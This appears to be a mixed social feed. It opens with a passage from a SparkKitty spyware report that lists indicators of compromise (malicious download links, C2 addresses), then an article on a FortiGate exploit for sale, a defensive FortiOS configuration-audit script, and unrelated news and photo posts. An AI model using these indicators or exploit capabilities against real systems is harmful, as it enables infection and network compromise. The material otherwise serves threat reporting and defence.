- The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.
Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:
- Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
- In both campaigns, we found the same infected Android apps.
- Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.
Takeaways
Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.
Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.
Our security products return the following verdicts when detecting malware associated with this campaign:
- HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
- HEUR:Trojan-Spy.IphoneOS.SparkKitty.*
Indicators of compromise
Infected Android apps
Infected iOS apps
Malicious iOS frameworks
Obfuscated malicious iOS libraries
Download links for infected apps
hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr
Pages distributing Trojans
hxxps://accgngrid[.]com
hxxps://byteepic[.]vip
C2 and configuration storage
C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk.com
Configurations
Paths
/sdcard/aray/cache/devices/.DEVICES
FortiGate under attack: tool for mass exploitation of exposed APIs on sale
A new and alarming development is shaking the cybersecurity landscape: a malicious actor has advertised on the dark web a highly sophisticated exploit aimed at compromising FortiGate devices.
It is a new exploit for FortiGate firewalls, sold at a price of 12,000 dollars, that has appeared for sale on the well-known underground forum Exploit. The post, published by a user with the pseudonym Anon-WMG, presents a tool capable of compromising Fortinet devices en masse by exploiting exposed APIs.
Technical characteristics of the exploit
Named “FortiGate API Dump Exploit (~7.2 and lower versions)”, the tool is able to interact with more than 170 FortiGate API endpoints, with declared compatibility for versions 6.x and 5.x, and also tested on 7.2.6 and earlier. The features include:
- Automatic dump from more than 170 Fortinet API endpoints
- Extraction of sensitive information: firewall configurations, local VPN users, SSL portals, backups, SNMP keys, DNS, HA and NTP parameters
- Multithreading support (more than 20 threads) for fast, large-scale scans
- Output in JSON format and structured configuration files
- Stealth headers and a dedicated reporting module (“Report Runner”)
The tool targets:
- FortiGate firewalls with exposed APIs (default ports: 443 and 10443)
- Misconfigured SSL/VPN portals
The author claims that the exploit is able to compromise:
- Internal and administrative network credentials (including hashes and encrypted passwords)
- Active SAML/RADIUS/LDAP tokens
- VPN tokens and IPSec session IDs
- Full configuration backups of the devices
Impact, spread and sale price
The implications are serious and include:
- Access to the internal network and lateral movement
- Theft of configurations, backups and credentials
- Compromise of VPN communications in progress
- Possibility of escalation through legitimate user tokens
The tool is reported as tested on numerous FortiOS versions: v6.0.9, 6.2.5, 7.0.4, 7.2.1, 7.2.6, 6.2.x and others.
- Asking price: 12,000 dollars
- Payment in cryptocurrency
- Negotiation via escrow to guarantee (at least formally) the transaction
- Some samples provided via a temporary link on “send.exploit.in”
- The author warns to contact him only in case of a real intention to buy
Countermeasures and recommendations
Organizations that use FortiGate must act immediately, especially if:
- The API interfaces are exposed directly to the Internet
- The devices run obsolete firmware versions
- The VPN/SSL portals are not configured correctly
Operational recommendations:
- Perform an immediate audit of the exposed interfaces
- Update all devices to the most recent supported FortiOS version
- Limit API access to internal or authorized IP addresses only
- Enable API logs to detect suspicious activity
- Revoke and regenerate active VPN tokens, verifying the integrity of the configurations
Conclusions
The availability of an automated exploit like this on the underground market highlights once again how critical it is to expose, even only partially, management interfaces that are not adequately protected. In this case, unauthenticated access to the FortiGate APIs can lead to the complete compromise of a network.
The article FortiGate under attack: tool for mass exploitation of exposed APIs on sale comes from the cybersecurity blog.
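An added example, not part of the original article and not Fortinet tooling: one way to run the audit and trusted-host recommendations above offline against a configuration backup. The sample configuration is constructed, and two rules are this example's own assumptions: Internet-facing interfaces are tagged `set role wan`, and an account counts as restricted when at least one trusted host differs from 0.0.0.0/0.

```python
import shlex

# Constructed FortiOS-style configuration excerpt (not from a real device).
SAMPLE_CONFIG = """\
config system interface
    edit "wan1"
        set allowaccess ping https ssh
        set role wan
    next
    edit "internal"
        set allowaccess ping https
        set role lan
    next
end
config system admin
    edit "admin"
        set accprofile "super_admin"
    next
    edit "netops"
        set trusthost1 10.0.0.0 255.255.255.0
    next
    edit "legacy"
        set trusthost1 0.0.0.0 0.0.0.0
    next
end
config system api-user
    edit "backup-bot"
        set accprofile "read_only"
    next
    edit "monitoring"
        config trusthost
            edit 1
                set ipv4-trusthost 10.0.0.50 255.255.255.255
            next
        end
    next
end
"""

ANY_HOST = (["0.0.0.0", "0.0.0.0"], ["::/0"])  # values meaning "any source address"

def tokenize(text):
    """Yield one token list per non-empty line, honouring double-quoted names."""
    for line in text.splitlines():
        try:
            tokens = shlex.split(line)
        except ValueError:  # unbalanced quote inside a value
            tokens = line.split()
        if tokens:
            yield tokens

def parse(lines):
    """Recursively turn config/edit blocks into {'set', 'edit', 'config'} nodes."""
    node = {"set": {}, "edit": {}, "config": {}}
    for tok in lines:  # 'lines' is one shared iterator across all recursion levels
        if tok[0] == "set" and len(tok) >= 2:
            node["set"][tok[1]] = tok[2:]
        elif tok[0] == "config":
            node["config"][" ".join(tok[1:])] = parse(lines)
        elif tok[0] == "edit" and len(tok) >= 2:
            node["edit"][tok[1]] = parse(lines)
        elif tok[0] in ("next", "end"):
            break
    return node

def entries(node, path):
    return node["config"].get(path, {"edit": {}})["edit"]

def restricted(hosts):
    """Assumption of this example: one non-wildcard trusted host is a restriction."""
    return any(h not in ANY_HOST for h in hosts)

def audit(config_text):
    """Return (kind, name, reason) findings for exposed GUI/API access."""
    root = parse(tokenize(config_text))
    findings = []
    for name, node in entries(root, "system interface").items():
        mgmt = {"http", "https"} & set(node["set"].get("allowaccess", []))
        role = node["set"].get("role", ["undefined"])[0]
        if mgmt and role in ("wan", "undefined"):
            findings.append(("interface", name, "GUI/API allowed: " + ",".join(sorted(mgmt))))
    for name, node in entries(root, "system admin").items():
        hosts = [v for k, v in node["set"].items() if "trusthost" in k]
        if not restricted(hosts):
            findings.append(("admin", name, "no effective trusted-host restriction"))
    for name, node in entries(root, "system api-user").items():
        hosts = [e["set"].get("ipv4-trusthost", ANY_HOST[0])  # IPv4 entries only
                 for e in entries(node, "trusthost").values()]
        if not restricted(hosts):
            findings.append(("api-user", name, "token usable from any source address"))
    return findings
```

Calling `audit()` on a real backup returns the interfaces and accounts to review first; it reads the file only and never contacts the device.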
Morgan Stanley’s Wilson Says Geopolitical Selloffs Fade Fast
https://www.bloomberg.com/news/articles/2025-06-23/morgan-stanley-s-wilson-says-geopolitical-selloffs-fade-fast?utm_source=flipboard&utm_medium=activitypub
Posted into Middle East @middle-east-bloomberg
No Kings (14 June 2025 in Jersey City, New Jersey)
More photos at Flickr:
flickr.com/photos/jbm0/albums/…
#NoKings #protest #rally #demonstration #NewJersey #JerseyCity #photograph #photographs #photography #nofaces
No Kings (Jersey City, NJ)
14 June 2025: the No Kings gathering in Jersey City, New Jersey
Jeff Moore (Flickr)
Tim Chambers reshared this.
🎯 ■ A Spanish woman returns to Spain after living abroad for years and tells openly what this reality is like ■ "But nobody talks to you about that".
huffingtonpost.es/virales/una-…
#tiktok #vivirenelextranjero #virales #espana #viajes #espanolesporelmundo
A Spanish woman returns to Spain after living abroad for years and tells openly what this reality is like
TikTok user Laura (@laura.argal), a Spanish woman who creates content about emigrating, returning and readjusting, has uploaded a video to her TikTok account telling openly what the reality of returning to Spain is like.
Alba Rodríguez Morales (El HuffPost)
Tyrese Haliburton's dramatic injury during the last game of the NBA Finals - Il Post
https://www.ilpost.it/flashes/video-infortunio-tyrese-haliburton-indiana-pacers-finals-nba-2025/?utm_source=flipboard&utm_medium=activitypub
Published in News @news-ilPost
News reshared this.
“L’evoluzionista riluttante”: the everyday Darwin as told by David Quammen
"L'evoluzionista riluttante" is an intimate and psychological portrait of the father of the theory of evolution, captured in his anxieties, contradictions and extraordinary domestic insights: the real voyage was not on the Beagle, but inside himself
articles by Gionata Stancher
Gionata Stancher is a researcher and science communicator who works as curator of the Zoology section of the Fondazione Museo Civico di Rovereto.
Gionata Stancher (Pikaia - Il portale dell'evoluzione)
I just did a speed test from my current bandwidth provider. As I've said before I use 4G plus Internet because it's magnitudes faster than the 10MBit/s which the xDSL provider gives with which are the most I can get 3.2 TBytes per month
1TB=1024GB
I will never be able to fill a proper hard drive in one month at such speeds. A proper hard drive is 16 TB at minimum
The speeds are OK for this point in time
The image displays a screenshot of the OpenSpeedTest app interface. At the top, the app's logo and name "OpenSpeedTest™" are prominently featured. Below the logo, the text reads "HTML5 Internet Speed Test. no Flash or Java! Broadband Speed Test That Works on Any Web Browser." The main visual element is a circular gauge with a blue waveform, indicating the test's progress, which shows "All done" at the center. The gauge's scale ranges from 0 to over 1000, with the current speed at 0 Mbps. Below the gauge, the test results are displayed: "DOWNLOAD 35.9 Mbps," "PING 104 Jitter 2 ms," and "UPLOAD 9.3 Mbps." The text at the bottom states, "Designed to replicate your real-world connection speed! THE MOST ACCURATE AND POWERFUL NETWORK SPEED TEST TOOL. Run a Network Speed Test From Any Device, Including Phones, TVs, Consoles, and Computers." The app's website, "openspeedtest.com," is shown at the bottom, along with a navigation bar featuring a home icon, a padlock icon, and a menu icon. The device's status bar at the top shows the time as 04:27, 4G connectivity, and a battery level of 78%.
Provided by @altbot, generated privately and locally using Ovis2-8B
🌱 Energy used: 0.310 Wh
Two utopian stories about a time in which peace reigns in the Middle East and a basic income secures people's basic needs. But people remain true to themselves, and even the secured life is no paradise.
#Lesen #Literatur #2025reads #Israel #Utopie #Erzählung #Buch
Briefly presented on my #Blog: 👇
schreibgewitter.de/assaf-gavro…
Euro-Zone Private Sector Near Stagnation on Global Uncertainty
https://www.bloomberg.com/news/articles/2025-06-23/euro-zone-private-sector-near-stagnation-on-global-uncertainty?utm_source=flipboard&utm_medium=activitypub
Posted into Business @business-bloomberg
Europe has no shortage of defence, it is already armed to the teeth, argues British researcher Khem Rogaly. Even more defence only makes us more dependent on the Americans and, worse, destabilises our democracies and the climate.
Read more: corr.es/d77dfc
The image shows a corner of an office with a light wooden table. On the table there are two computers: an open laptop with a background of an illuminated city and a Samsung monitor showing graphic design software. Next to the monitor there is a mouse and a notebook. On the table there are also glasses, a pencil, a drill and a sheet with a grid. In the background there is a rubber panel full of post-its, postcards and drawings, and a globe hanging on the wall. The setting appears to be a creative workspace, with various tools and materials neatly arranged.
Provided by @altbot, generated locally and privately using Ovis2-8B
🌱 Energy used: 0.213 Wh
Cartoonjournaal 23 June 2025.
Read the accompanying post on my LinkedIn profile:
linkedin.com/posts/lokocartoon…
#cartoonjournaal #humor #actualiteit #nieuws
#Trump #NAVOtop #Iran #oorlog #Netanyahu #waardigheid #fatsoen #diplomatiek #bombaderdement #G7 #Oekraïne #Israël #Gaza
It is about security and it is about money, this coming week at the NATO summit in The Hague.
It is about security and it is about money, this coming week at the NATO summit in The Hague. But by now it is also about dignity and decency.
Lodewijk Koster (www.linkedin.com)
Behind the Scenes at the Python Software Foundation reveals an incredible 2024: just 3 developers authored 750+ pull requests while the ecosystem served 526 BILLION downloads (1.11 exabytes!). Meanwhile, the new malware report button got clicked 2000+ times. Busy year for everyone! 🐍
developers.slashdot.org/story/…
#Python #OpenSource #Programming
Behind the Scenes at the Python Software Foundation - Slashdot
The Python Software Foundation ("made up of, governed, and led by the community") does more than just host Python and its documentation, the Python Package Repository, and the development workflows of core CPython developers.
developers.slashdot.org
Toxic West: terror as a method, God as an alibi | Left
left.it/2025/06/23/occidente-t…
> God, bombs and terror. Netanyahu and Trump, twins who are not at all different
securityaffairs.com/179239/cyb…
#securityaffairs #hacking #malware
Iran-Linked Threat Actors Cyber Fattah Leak Visitors and Athletes' Data from Saudi Games
Cyber Fattah leaked thousands of records on athletes and visitors from past Saudi Games, per U.S.-based cybersecurity firm Resecurity.
Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Young Great Blue Heron
Photo of the Day
from my daily photo blog
#Birds #photography #wildphotography #birdphotography #WIldlifePhotography #Wildlife
like this
Schengen visas, door closed for many Africans.
For many Africans, dreaming of visiting Europe for tourism, conferences, education or family reunions is turning into an increasingly difficult struggle. The latest statistics from the European Commission reveal a worrying reality: African applicants face some of the highest rejection rates in the world when trying to obtain a Schengen visa.
In 2024, thousands of African travellers saw their travel hopes shattered. According to official data, countries such as Comoros, Guinea-Bissau, Senegal, Nigeria and Ghana recorded rejection rates ranging between 45% and 63%, making them among the hardest hit globally.
This year, the Schengen area received more than 11.7 million applications for short-stay visas. Although global demand rose by 13.6%, the door remained firmly closed for many Africans.
Not only insult, but injury too.
Every Schengen visa application costs 90 euros (about 100 US dollars), regardless of the outcome. It is a non-refundable fee that must be paid even when the application is rejected, often with minimal explanation.
According to an analysis by the LAGO Collective, Africans lost an estimated 60 million euros (67.5 million dollars) in 2024 alone because of rejected applications. This is money spent not on travelling, but because of bureaucracy.
“The poorest nations in the world are paying the richest countries not to be accepted,” says Marta Foresti, founder of the aforementioned association, which is based in the United Kingdom. “The poorer the country of origin, the higher the rejection rates.” From the European point of view, however, the explanation is rather evident: the fear that once the visa has expired, the visitor will disappear without trace and no longer return to the country of origin.
The European Commission's data reveal how unequal the burden of rejections is:
– Comoros: 62.8%
– Guinea-Bissau: 47.0%
– Senegal: 46.8%
– Nigeria: 45.9%
– Ghana: 45.5%
– Congo-Brazzaville: 43.0%
– Mali: about 43%
– Guinea: 41.1%
– Burundi: 40.0%
– Ethiopia: 36.1%
By way of comparison, the global average rejection rate stands at around 18%, making the African figures exceptionally high.
More Than a Bureaucratic Matter
European embassies insist that every application is assessed individually, considering aspects such as the purpose of the visit, financial means and the applicant's willingness to return home. However, critics argue that the process remains opaque, with little accountability.
“These high rejection rates are not just administrative, but symptomatic of deeper problems: inequality, suspicion and systemic prejudice,” Foresti adds.
Many applicants say they regularly submit all the necessary documents, from employment letters to bank statements and travel insurance, only to receive vague refusals without clarification. In some cases, people are repeatedly refused, even for legitimate travel reasons such as conferences or family events.
While African governments build partnerships with Europe in various sectors, including trade, education and technology, the barriers to movement contrast sharply with the rhetoric of cooperation. Meanwhile, European citizens face little resistance when travelling to Africa, raising difficult questions about fairness, reciprocity and respect.
In a globalised world where mobility often equals opportunity, Africans find themselves excluded not because they lack intention or preparation, but because the system seems increasingly tilted against them. With pressure mounting for visa reform and greater transparency, the hope is that African voices and wallets will not continue to bear the highest costs for the lowest results.
Source: africanews.com
Il blogverso italiano di Wordpress reshared this.
The answer also applies to the #Zionist abomination.
FortiGate under attack: tool for mass exploitation of exposed APIs on sale
📌 Link to the article: redhotcyber.com/post/fortigate…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy
FortiGate under attack: tool for mass exploitation of exposed APIs on sale
On sale on an underground forum, a tool for exploiting exposed FortiGate APIs: more than 170 vulnerable endpoints and full access to compromised firewalls.
Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
The Night Chancellor Merz Changed His Mind About Donald Trump
After Trump publicly belittled Zelenskyy and rumors swirled of a U.S. NATO exit, Germany’s chancellor-elect Friedrich Merz ditched his debt-brake pledge, backing roughly €1 trillion in new borrowing to rearm Germany and speed an independent European defense.
s1m0n4 reshared this.
In fact, the public attitude of «L’Ora» had been, if possible, even more critical. An unsigned article of 8 July 1963, titled “Politica e violenza a Palermo”, was to be attributed to the editor; it had explicitly accused the Palermo city government of
This 88-Year-Old Reporter Predicted How US Would Attack Iran And It has Happened Exactly
Seymour Hersh. Nearly 88, running his Substack, and still outpacing governments, intelligence leaks, and every newsroom, Hersh once again proved why he’s a legend in investigative journalism.
On June 19, he published a detailed exposé revealing that U.S. B-2 bombers and naval forces were preparing a “coordinated assault” on Iran’s key underground nuclear sites at Fordow, Natanz, and Isfahan. He cited unnamed intelligence sources warning the attack was imminent and happening with almost no oversight from Congress or NATO allies.
Many brushed it off. Some called it far-fetched. On Sunday, when President Donald Trump confirmed the strikes and declared the targets “obliterated,” Hersh had already been proven right, two days ahead of the world.
This isn’t Hersh’s first time uncovering what others missed. His 2023 scoop on the Nord Stream pipeline sabotage, which he linked to U.S. operations, followed a similar path: ignored at first, later echoed by leaked investigations. The Iran bombing story played out just the same: initial silence, disbelief, then confirmation.
But Hersh’s reporting also points to a bigger shift. More than 60% of Americans now get their breaking news from social media, newsletters, and independent platforms. The reason? Speed, raw reporting, and growing distrust in traditional journalism. Hersh calls it like he sees it, often accusing mainstream reporters of being too close to power to ask real questions.
This 88-Year-Old Reporter Predicted How US Would Attack Iran And It has Happened Exactly
Hersh exposed US B-2 bombers and naval forces preparing a coordinated attack on Iran's nuclear sites, citing unnamed intelligence sources, with no oversight from Congress or NATO allies.
Shruti Sneha (Republic World)
A book: Il mio traditore
Starting from his real friendship with Denis Donaldson, leader of the IRA and Sinn Féin, Chalandon tells of Antoine, a young Parisian with a passion for traditional Irish music, who arrives in Belfast in 1975 with a friend's words in mind: if you don't know the North you don't know Ireland
Here the glossy image he had of the country gives way to a land of clashes, of death, but also of friendship
A book: Il mio traditore
Starting from his real friendship with Denis Donaldson, leader of the IRA and Sinn Féin, Sorj Chalandon tells of Antoine, a young Parisian luthier with a passion for traditional music…
Paoblog.net
theguardian.com/us-news/2025/j…
Senator Padilla recounts the experience of being suddenly attacked and handcuffed by agents, while the agents who had brought him there said nothing about who he was.
‘It’s time to wake up’: Padilla recounts being handcuffed at Noem briefing in emotional speech
California senator details being restrained and warns of how democratic norms can slip away when power is unchecked
Lauren Gambino (The Guardian)
@DLR & @awi show how food production could work in extreme environments.
🔗 Find out how: helmholtz.de/en/about-us/helmh… #Helmholtz30
Story #28
In the course of its five-year mission in the Antarctic, the DLR greenhouse EDEN ISS produced more than a metric ton of fresh vegetables – for
Helmholtz-Gemeinschaft Deutscher Forschungszentren
reshared this
The Martini family, whose founders were Lorenzo Giovanni Battista Martini and Maria Giacinta Carmela Lanzani, consisted of no fewer than twelve children, six boys and six girls: Maria, Augusto, Maddalena Virginia, Domenico, Alessandro, Giuseppe, Teresa, Lidia, Renata, Mario, Carla Liliana and Giancarlo <123. They live in
US ‘primary force’ behind Israel’s acts of aggression against Iran: Pezeshkian
Iran’s president says Tehran’s decisive response to the Israeli regime’s acts of aggression forced US to “step in” and attack the peaceful nuclear sites.
PressTV
Berlin government announces a series of new legislative projects
More powers for the police, better protection for victims of domestic violence, a higher state minimum wage, socialisations: at its retreat, Berlin's governing coalition agreed on a series of projects.
www.rbb24.de
artist: Mathew Brady Studio, active 1844 - 1894
source: National Portrait Gallery
notes: The Frederick Hill Meserve Collection comprises more than five thousand […]
#Art #Design #Museum #Gallery #MastodonArt #MastoArt #Culture #Random
npg.si.edu/object/npg_NPG.81.M…
hwupgrade.it/news/sistemi-oper…
Bill Gates and Linus Torvalds have met for the first time: the photo that makes history
Bill Gates and Linus Torvalds met publicly for the first time during an informal dinner hosted by Mark Russinovich of Microsoft. Also present was Dave Cutler, veteran Windows engineer.
Hardware Upgrade
diggita - istanza lemmy reshared this.
A profile of Katie Haun, a former federal prosecutor turned a16z partner who later founded Haun Ventures and believes the GENIUS Act will make stablecoins safer (Connie Loizos/TechCrunch)
techcrunch.com/2025/06/22/the-…
techmeme.com/250623/p5#a250623…
The stablecoin evangelist: Katie Haun's fight for digital dollars | TechCrunch
In 2018, when Bitcoin was trading around $4,000 and most Americans, at least, thought cryptocurrency was a fad, Katie Haun found herself on a debate stage in Mexico City opposite Paul Krugman, the Nobel Prize-winning economist.
Connie Loizos (TechCrunch)
Iran says US has 'blown up' any attempt to end the Israel-Iran conflict diplomatically
World leaders, including the EU and the UK, have called on Iran to engage in negotiations with the US and Israel.
TheJournal.ie
In French cities, twinning arrangements with Israel sow discord
mcinformactions.net/dans-les-v…
#israel #palestine #Hamas #Cisjordanie #Gaza
In French cities, twinning arrangements with Israel sow discord - [mcInform@ctions]
For several weeks, a debate has been raging in several French cities: should twinning arrangements with localities be ended...
mcinformactions.net
niccolo
in reply to nixCraft 🐧 • • •- YouTube
www.youtube.comArnaud Mangasaryan
in reply to nixCraft 🐧 • • •RIBBBITn3rding
in reply to nixCraft 🐧 • • •Max
in reply to nixCraft 🐧 • • •James Cameroun
in reply to nixCraft 🐧 • • •Zeki Çatav 🤔 ☕ 🕯️🎶
in reply to nixCraft 🐧 • • •🇺🇸 🇺🇦 🇮🇱 🐧 🥦
in reply to nixCraft 🐧 • • •Cyb3rBr4in_r00t 👾
in reply to nixCraft 🐧 • • •Harish
in reply to nixCraft 🐧 • • •Al & Val's Modern Homesteading
in reply to nixCraft 🐧 • • •Sibshops
in reply to nixCraft 🐧 • • •JamesTDG
in reply to nixCraft 🐧 • • •Hypertext MARKUP language
Merry Christmas
in reply to nixCraft 🐧 • • •JamesB192
in reply to nixCraft 🐧 • • •well, you can get it from porn sites.
/me ducks.
François @Prague
in reply to nixCraft 🐧 • • •kafilmao
in reply to nixCraft 🐧 • • •ʙᴇɴ ᴄᴏᴛᴛᴇяɪʟʟ
in reply to nixCraft 🐧 • • •Robin Barton
in reply to nixCraft 🐧 • • •eickot
in reply to nixCraft 🐧 • • •